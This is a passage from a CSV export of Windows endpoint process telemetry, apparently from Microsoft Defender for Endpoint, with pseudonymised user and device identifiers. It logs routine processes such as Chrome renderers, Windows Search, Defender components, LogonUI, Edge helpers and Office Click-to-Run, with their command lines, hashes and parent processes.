02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 02:55:16.213537200+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1345,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:21:17.640893300+00:00,9148,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:21:18.237709+00:00,2021-06-24 02:22:44.201064600+00:00,a55a0ef4-2199-4d8b-bac9-19989ba22fd1,computerpii_0a470890c60768167990033d701e7bd881398861,173133,False,10.7740.19041.1052,False,11540474045175164,,11540474045175976,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1346,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:21:48.798269700+00:00,4080,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320756_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320756 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:21:48.814459+00:00,2021-06-24 02:22:44.202426+00:00,48c69653-9aa4-4f54-bb0a-6da4cd6781dc,computerpii_0a470890c60768167990033d701e7bd881398861,173145,False,10.7740.19041.1052,False,11540474045144190,,11540474045175977,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1347,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:23:44.319955900+00:00,9416,SystemSettingsBroker.exe,SystemSettingsBroker.exe -Embedding,PortableExecutable,2021-02-17 04:34:43.251617300+00:00,C:\Windows\System32\SystemSettingsBroker.exe,205040,c0d134b5f3f4541b92342d62f2ca4dc9,0fe9631be461029b533a86df1c2e72be2539668333cb24c116e1c98344f26c34,424d3fdb3bdc249926e828286c87de486546bf73,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:23:44.375820500+00:00,2021-06-24 07:26:00.611756700+00:00,06686752-86aa-43ab-9a29-ee0582ffd087,computerpii_0a470890c60768167990033d701e7bd881398861,177026,False,10.7740.19041.1052,False,11540474045136908,,11540474045177102,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,System Settings Broker,SystemSettingsBroker.exe,System Settings Broker
+1348,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:10:56.489319100+00:00,2140,SenseIR.exe,"""SenseIR.exe"" ""OnlineSenseIR"" ""1800"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:10:56.540907400+00:00,2021-06-23 03:12:10.711624200+00:00,d7525112-20e6-489a-9702-fd8f30e79a60,computerpii_0a470890c60768167990033d701e7bd881398861,160974,False,10.7740.19041.1052,False,11540474045137006,,11540474045172997,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+1349,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:11:04.942047800+00:00,20012,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 5D5B847C-E39D-618C-F336-D1EFFB6A1DEA ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:11:05.186268500+00:00,2021-06-23 03:12:10.712831300+00:00,b7f05e32-2ed9-4f61-a810-e0bbddf8f185,computerpii_0a470890c60768167990033d701e7bd881398861,160989,False,10.7740.19041.1052,False,11540474045145394,,11540474045172998,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1350,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:47:33.435618900+00:00,11976,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xad041855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:47:33.578818+00:00,2021-06-23 02:47:53.254741600+00:00,48fa0d74-d070-47eb-bc07-fac018bd01df,computerpii_0a470890c60768167990033d701e7bd881398861,159943,False,10.7740.19041.1052,False,11540474045171720,,11540474045172816,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1351,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:47:43.049459200+00:00,14876,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:47:43.266236200+00:00,2021-06-23 02:47:53.254968800+00:00,a01a358f-0559-43ac-94d7-a36cf7122523,computerpii_0a470890c60768167990033d701e7bd881398861,159948,False,10.7740.19041.1052,False,11540474045171838,,11540474045172817,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,chrome.exe,11880,256,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1352,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 02:54:23.616981600+00:00,7112,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 8FE4FE7E-7E9A-917A-CCA7-473A80507C8D ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:54:23.908813200+00:00,2021-06-24 02:56:31.244205300+00:00,c72df99b-415a-4044-a77b-9e703345954a,computerpii_0a470890c60768167990033d701e7bd881398861,173756,False,10.7740.19041.1052,False,11540474045145394,,11540474045176117,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1353,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:56:00.432540100+00:00,17204,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6588 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:56:00.495479200+00:00,2021-06-24 02:56:31.245693200+00:00,db31d1f2-5016-40f1-ba50-3270a06acf07,computerpii_0a470890c60768167990033d701e7bd881398861,173779,False,10.7740.19041.1052,False,11540474045175158,,11540474045176122,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1354,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:53:42.528263500+00:00,11348,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /ua /installsource scheduler",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:53:42.653468500+00:00,2021-06-25 00:55:58.748450300+00:00,a9b7732b-6c0c-486f-b747-f4f8c2ecc011,computerpii_0a470890c60768167990033d701e7bd881398861,182049,False,10.7740.19041.1052,False,11540474045136925,,11540474045178506,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+1355,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:54:21.764161800+00:00,11136,OfficeC2RClient.exe,"""OfficeC2RClient.exe"" /WatchService",PortableExecutable,2021-06-12 08:56:59.029539+00:00,C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe,23080816,0dc113fc1d718e1951bb9c59f2ac9547,1c8f95ff4650c68fffc16576e905462a6b8e1b965156073701c8ab7732a06367,78627ab451d9269178de0c336d68bdb14475501b,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:54:22.066619300+00:00,2021-06-25 00:55:58.750885300+00:00,3378b509-3780-426e-8042-5930060a70e4,computerpii_0a470890c60768167990033d701e7bd881398861,182122,False,10.7740.19041.1052,False,11540474045136925,,11540474045178524,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeC2RClient.exe,OfficeC2RClient.exe,Microsoft Office Click-to-Run Client
+1356,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:54:38.220520400+00:00,17484,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4896 /prefetch:8",PortableExecutable,2021-06-25 00:37:01.284115+00:00,C:\Program Files 